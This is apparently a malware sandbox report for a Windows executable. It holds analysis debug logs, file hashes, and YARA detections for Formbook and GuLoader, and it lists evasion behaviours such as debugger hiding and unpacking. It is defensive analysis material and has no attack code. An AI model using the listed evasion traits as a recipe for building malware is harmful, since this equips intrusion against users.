2020-06-05 13:45:32,781 [root] DEBUG: DLL loaded at 0x73110000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-05 13:45:32,796 [root] DEBUG: DLL loaded at 0x73DC0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32 (0x19e000 bytes).
2020-06-05 13:45:32,796 [root] DEBUG: DLL unloaded from 0x743C0000.
2020-06-05 13:45:32,796 [root] DEBUG: DLL unloaded from 0x74830000.
2020-06-05 13:45:42,140 [root] DEBUG: DLL unloaded from 0x76160000.
2020-06-05 13:45:42,156 [root] DEBUG: DLL unloaded from 0x77020000.
2020-06-05 13:45:42,156 [root] DEBUG: DLL unloaded from 0x70370000.
2020-06-05 13:45:52,234 [root] DEBUG: DLL unloaded from 0x76640000.
2020-06-05 13:46:01,640 [root] DEBUG: DLL loaded at 0x70370000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 13:46:01,656 [root] DEBUG: DLL loaded at 0x735C0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 13:46:01,671 [root] DEBUG: DLL loaded at 0x6D670000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-06-05 13:46:11,640 [root] DEBUG: DLL unloaded from 0x76160000.
2020-06-05 13:46:11,640 [root] DEBUG: DLL unloaded from 0x77020000.
2020-06-05 13:46:11,640 [root] DEBUG: DLL unloaded from 0x70370000.
2020-06-05 13:46:12,859 [root] DEBUG: CreateThread: Initialising breakpoints for thread 4756.
2020-06-05 13:46:12,859 [root] DEBUG: DLL unloaded from 0x76E70000.
2020-06-05 13:46:12,859 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1e2b0 SEH: ntdll.dll+1e355 0041e2b0, Fault Address: 0041e2b0, Esp: 03baff8c, Exception Code: c0000005,  kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb Bytes at EIP: 55 8b ec 83 ec 64 e8 b5 c8 ff ff 8
2020-06-05 13:46:12,875 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab70 SEH: ntdll.dll+1e355 0041ab70, Fault Address: 0041ab70, Esp: 03baff20, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1e2bb kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb Bytes at EIP: 55 8b ec 81
2020-06-05 13:46:12,875 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1b060 SEH: ntdll.dll+1e355 0041b060, Fault Address: 0041b060, Esp: 03baf278, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1ab96 c6Dqqn8fjGAx.exe+1e2bb kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb By
2020-06-05 13:46:12,875 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+9e40 SEH: ntdll.dll+1e355 00409e40, Fault Address: 00409e40, Esp: 03baf274, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fjGAx.exe+1e2bb kernel32.dll+4efac ntdll.dll+63618 ntdll.dll+635eb Byt
2020-06-05 13:46:12,890 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+187b0 SEH: ntdll.dll+1e355 004187b0, Fault Address: 004187b0, Esp: 03baf254, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fjGAx.exe+1e2bb kernel32.
2020-06-05 13:46:12,890 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1d787 SEH: ntdll.dll+1e355 0041d787, Fault Address: 0041d787, Esp: 03baf240, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+187bf c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fj
2020-06-05 13:46:12,906 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+15da0 SEH: ntdll.dll+1e355 00415da0, Fault Address: 00415da0, Esp: 03baf238, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+187cf c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjGAx.exe+1aba2 c6Dqqn8fj
2020-06-05 13:46:12,921 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+82a0 SEH: ntdll.dll+1e355 004082a0, Fault Address: 004082a0, Esp: 03baf21c, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+15db0 c6Dqqn8fjGAx.exe+187cf c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjG
2020-06-05 13:46:12,937 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+ac70 SEH: ntdll.dll+1e355 0040ac70, Fault Address: 0040ac70, Esp: 03baf0f0, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+1871b c6Dqqn8fjGAx.exe+187d5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjG
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+14e90 SEH: ntdll.dll+1e355 00414e90, Fault Address: 00414e90, Esp: 03baf21c, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+9d20 c6Dqqn8fjGAx.exe+187dd c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4d c6Dqqn8fjG
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0041cfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00419fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,953 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00417fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,968 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00416fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,984 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00413fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,984 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00412fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:12,984 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00411fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,000 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00410fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,000 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040ffff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,000 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040efff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040dfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040cfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 0040bfff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,015 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00407fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00406fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00405fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00404fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00403fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00402fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,046 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1ab23 SEH: ntdll.dll+1e355 0041ab23, Fault Address: 00401fff, Esp: 03baf184, Exception Code: c0000005,  ntdll.dll+0 c6Dqqn8fjGAx.exe+9cd7 c6Dqqn8fjGAx.exe+187e5 c6Dqqn8fjGAx.exe+9da3 c6Dqqn8fjGAx.exe+9e4
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0041f000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00420000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00421000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,671 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00422000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00423000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00424000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00425000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00426000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,687 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00427000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,703 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00428000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,734 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 00429000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,750 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0042a000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,750 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0042b000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:13,750 [root] DEBUG: Exception Caught! PID: 5848 EIP: c6Dqqn8fjGAx.exe+1aff3 SEH: ntdll.dll+1e355 0041aff3, Fault Address: 0042c000, Esp: 03baeac4, Exception Code: c0000005,  c6Dqqn8fjGAx.exe+144f9 c6Dqqn8fjGAx.exe+c3a7 c6Dqqn8fjGAx.exe+1abb5 c6Dqqn8fjGAx.exe+1e2bb kernel32
2020-06-05 13:46:14,921 [root] DEBUG: CreateThread: Initialising breakpoints for thread 4420.
2020-06-05 13:46:14,921 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 5848).
2020-06-05 13:46:14,921 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x188f4a0.
2020-06-05 13:46:14,937 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 5848
2020-06-05 13:46:14,937 [root] DEBUG: GetHookCallerBase: thread 4420 (handle 0x23c), return address 0x001513DB, allocation base 0x00150000.
2020-06-05 13:46:14,937 [root] DEBUG: DoProcessDump: Dumping Imagebase at 0x00400000.
2020-06-05 13:46:14,937 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image.
2020-06-05 13:46:14,937 [root] DEBUG: DumpPE: Instantiating PeParser with address: 0x00400000.
2020-06-05 13:46:14,937 [root] DEBUG: DumpPE: Empty or inaccessible last section, file image seems incomplete (from 0x00401000 to 0x0042CA00).
2020-06-05 13:46:14,953 [root] INFO: b'C:\\IaUfpVzipc\\CAPE\\5848_1314215590435135562020|5848|0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?'
2020-06-05 13:46:14,953 [root] INFO: cape
2020-06-05 13:46:14,953 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_1314215590435135562020', b'0;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?C:\\Users\\Rebecca\\AppData\\Local\\Temp\\c6Dqqn8fjGAx.exe;?', ['5848'], 'procdump')
2020-06-05 13:46:15,031 [root] INFO: ('dump_file', 'C:\\IaUfpVzipc\\CAPE\\5848_1314215590435135562020', '', False, 'files')
2020-06-05 13:46:15,046 [root] DEBUG: DumpPE: PE file in memory dumped successfully - dump size 0x2ca00.
2020-06-05 13:46:15,062 [root] DEBUG: DLL unloaded from 0x76130000.
2020-06-05 13:46:15,062 [root] WARNING: Unable to open termination event for pid 5848.
2020-06-05 13:46:15,062 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 5848).
2020-06-05 13:46:15,062 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x188f4a0.
2020-06-05 13:48:35,546 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-05 13:48:35,546 [lib.api.process] ERROR: Failed to open terminate event for pid 5596
2020-06-05 13:48:35,546 [root] INFO: Terminate event set for process 5596.
2020-06-05 13:48:35,546 [lib.api.process] ERROR: Failed to open terminate event for pid 5848
2020-06-05 13:48:35,546 [root] INFO: Terminate event set for process 5848.
2020-06-05 13:48:35,546 [root] INFO: Created shutdown mutex.
2020-06-05 13:48:36,546 [root] INFO: Shutting down package.
2020-06-05 13:48:36,546 [root] INFO: Stopping auxiliary modules.
2020-06-05 13:48:36,640 [lib.common.results] WARNING: File C:\IaUfpVzipc\bin\procmon.xml doesn't exist anymore
2020-06-05 13:48:36,640 [root] INFO: Finishing auxiliary modules.
2020-06-05 13:48:36,640 [root] INFO: Shutting down pipe server and dumping dropped files.
2020-06-05 13:48:36,640 [root] INFO: Uploading files at path "C:\IaUfpVzipc\debugger" 
2020-06-05 13:48:36,656 [root] INFO: Analysis completed.

Machine

Name Label Manager Started On Shutdown On
win7_1 win7_1 KVM 2020-06-05 13:56:58 2020-06-05 14:03:56

File Details

File Name c6Dqqn8fjGAx
File Size 81920 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
PE timestamp 2016-04-21 00:38:38
MD5 5484fdf0fb3f9b032d2ab493c7ac7283
SHA1 7765cfc9f2db46690167113e01b498219401d2e1
SHA256 ee4ae13d3fd3b58d86e270db11937476b4b7add1673983c2c28ed4d7dcc75552
SHA512 d3ba7caec49f1f200971dc8f7f18e267dbd10825cc1ea4ff8cb8c4983d2af27470f0d2316b96589585fa1931d6fc0b4ed76757c8a0a81b2690a3d8c12a347159
CRC32 47E256BC
Ssdeep 1536:ZxDDrdLtwzY/uWK1cwDwvARJKznbASJ8EKc:ZZrdhUY/i1BEYKz/f
Download Download ZIP Resubmit sample

Signatures

Behavioural detection: Executable code extraction - unpacking
Yara rule detections observed from a process memory dump/dropped files/CAPE
Hit: PID 5848 trigged the Yara rule 'shellcode_get_eip'
Hit: PID 5848 trigged the Yara rule 'shellcode_stack_strings'
Hit: PID 5848 trigged the Yara rule 'Formbook'
Hit: PID 5596 trigged the Yara rule 'shellcode_patterns'
Hit: PID 5596 trigged the Yara rule 'shellcode_get_eip'
Hit: PID 5596 trigged the Yara rule 'HeavensGate'
Hit: PID 5596 trigged the Yara rule 'GuLoader'
Creates RWX memory
NtSetInformationThread: attempt to hide thread from debugger
Possible date expiration check, exits too soon after checking local time
process: c6Dqqn8fjGAx.exe, PID 5596
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: OLEAUT32.dll/OleLoadPictureEx
DynamicLoader: OLEAUT32.dll/DispCallFunc
DynamicLoader: OLEAUT32.dll/LoadTypeLibEx
DynamicLoader: OLEAUT32.dll/UnRegisterTypeLib
DynamicLoader: OLEAUT32.dll/CreateTypeLib2
DynamicLoader: OLEAUT32.dll/VarDateFromUdate
DynamicLoader: OLEAUT32.dll/VarUdateFromDate
DynamicLoader: OLEAUT32.dll/GetAltMonthNames
DynamicLoader: OLEAUT32.dll/VarNumFromParseNum
DynamicLoader: OLEAUT32.dll/VarParseNumFromStr
DynamicLoader: OLEAUT32.dll/VarDecFromR4
DynamicLoader: OLEAUT32.dll/VarDecFromR8
DynamicLoader: OLEAUT32.dll/VarDecFromDate
DynamicLoader: OLEAUT32.dll/VarDecFromI4
DynamicLoader: OLEAUT32.dll/VarDecFromCy
DynamicLoader: OLEAUT32.dll/VarR4FromDec
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromTypeInfo
DynamicLoader: OLEAUT32.dll/GetRecordInfoFromGuids
DynamicLoader: OLEAUT32.dll/SafeArrayGetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArraySetRecordInfo
DynamicLoader: OLEAUT32.dll/SafeArrayGetIID
DynamicLoader: OLEAUT32.dll/SafeArraySetIID
DynamicLoader: OLEAUT32.dll/SafeArrayCopyData
DynamicLoader: OLEAUT32.dll/SafeArrayAllocDescriptorEx
DynamicLoader: OLEAUT32.dll/SafeArrayCreateEx
DynamicLoader: OLEAUT32.dll/VarFormat
DynamicLoader: OLEAUT32.dll/VarFormatDateTime
DynamicLoader: OLEAUT32.dll/VarFormatNumber
DynamicLoader: OLEAUT32.dll/VarFormatPercent
DynamicLoader: OLEAUT32.dll/VarFormatCurrency
DynamicLoader: OLEAUT32.dll/VarWeekdayName
DynamicLoader: OLEAUT32.dll/VarMonthName
DynamicLoader: OLEAUT32.dll/VarAdd
DynamicLoader: OLEAUT32.dll/VarAnd
DynamicLoader: OLEAUT32.dll/VarCat
DynamicLoader: OLEAUT32.dll/VarDiv
DynamicLoader: OLEAUT32.dll/VarEqv
DynamicLoader: OLEAUT32.dll/VarIdiv
DynamicLoader: OLEAUT32.dll/VarImp
DynamicLoader: OLEAUT32.dll/VarMod
DynamicLoader: OLEAUT32.dll/VarMul
DynamicLoader: OLEAUT32.dll/VarOr
DynamicLoader: OLEAUT32.dll/VarPow
DynamicLoader: OLEAUT32.dll/VarSub
DynamicLoader: OLEAUT32.dll/VarXor
DynamicLoader: OLEAUT32.dll/VarAbs
DynamicLoader: OLEAUT32.dll/VarFix
DynamicLoader: OLEAUT32.dll/VarInt
DynamicLoader: OLEAUT32.dll/VarNeg
DynamicLoader: OLEAUT32.dll/VarNot
DynamicLoader: OLEAUT32.dll/VarRound
DynamicLoader: OLEAUT32.dll/VarCmp
DynamicLoader: OLEAUT32.dll/VarDecAdd
DynamicLoader: OLEAUT32.dll/VarDecCmp
DynamicLoader: OLEAUT32.dll/VarBstrCat
DynamicLoader: OLEAUT32.dll/VarCyMulI4
DynamicLoader: OLEAUT32.dll/VarBstrCmp
DynamicLoader: ole32.dll/CoCreateInstanceEx
DynamicLoader: ole32.dll/CLSIDFromProgIDEx
DynamicLoader: SXS.DLL/SxsOleAut32MapIIDOrCLSIDToTypeLibrary
DynamicLoader: USER32.dll/GetSystemMetrics
DynamicLoader: USER32.dll/MonitorFromWindow
DynamicLoader: USER32.dll/MonitorFromRect
DynamicLoader: USER32.dll/MonitorFromPoint
DynamicLoader: USER32.dll/EnumDisplayMonitors
DynamicLoader: USER32.dll/GetMonitorInfoA
DynamicLoader: asycfilt.dll/FilterCreateInstance
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: kernel32.dll/NlsGetCacheUpdateCount
DynamicLoader: VERSION.DLL/VerQueryValueA
DynamicLoader: VERSION.DLL/GetFileVersionInfoSizeA
DynamicLoader: VERSION.DLL/GetFileVersionInfoA
DynamicLoader: kernel32.dll/GetCalendarInfoW
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSAIoctl
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: IPHLPAPI.DLL/NotifyIpInterfaceChange
DynamicLoader: IPHLPAPI.DLL/NotifyUnicastIpAddressChange
